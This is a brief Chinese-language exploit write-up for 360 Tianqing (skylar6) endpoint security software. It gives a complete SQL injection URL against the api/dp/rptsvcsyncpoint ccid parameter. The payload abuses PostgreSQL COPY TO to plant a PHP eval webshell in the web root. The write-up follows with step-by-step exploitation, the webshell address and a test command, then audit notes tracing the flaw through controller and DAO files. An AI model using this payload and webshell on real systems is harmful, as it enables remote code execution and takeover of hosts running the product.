注入写shell:
https://192.168.24.196:8443/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:\Program Files (x86)\360\skylar6\www\1.php';drop table O;--
利用过程:
1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell
2. 通过注入点,创建一张表 O
3. 为 表O 添加一个新字段 T 并且写入shell内容
4. Postgres数据库 使用COPY TO把一个表的所有内容都拷贝到一个文件(完成写shell)
5. 删除 表O
shell地址:
https://192.168.24.196:8443/1.php
POST
1=phpinfo();
天擎默认安装位置: C:\Program Files (x86)\360\skylar6\
首先打开:C:\Program Files (x86)\360\skylar6\www\data\adminlog_path_dict.json 该路径存放了大量的接口地址,并且可以该文件已列出是否开放接口
那么重点先查看一下这些开放的端口即可
其中盯上了一个接口:api/dp/rptsvcsyncpoint
通过查看yii手册知道了路由走向,接口文件地址:C:\Program Files (x86)\360\skylar6\www\application\api\controllers\DpController.php
进来以后看到它接收了 $cc_id = $this->getParam("ccid") 并且被 getSyncPoint() 方法接收
跟进去getSyncPoint()方法 地址为: C:\Program Files (x86)\360\skylar6\www\source\domain\dao\DataPortalDao.php
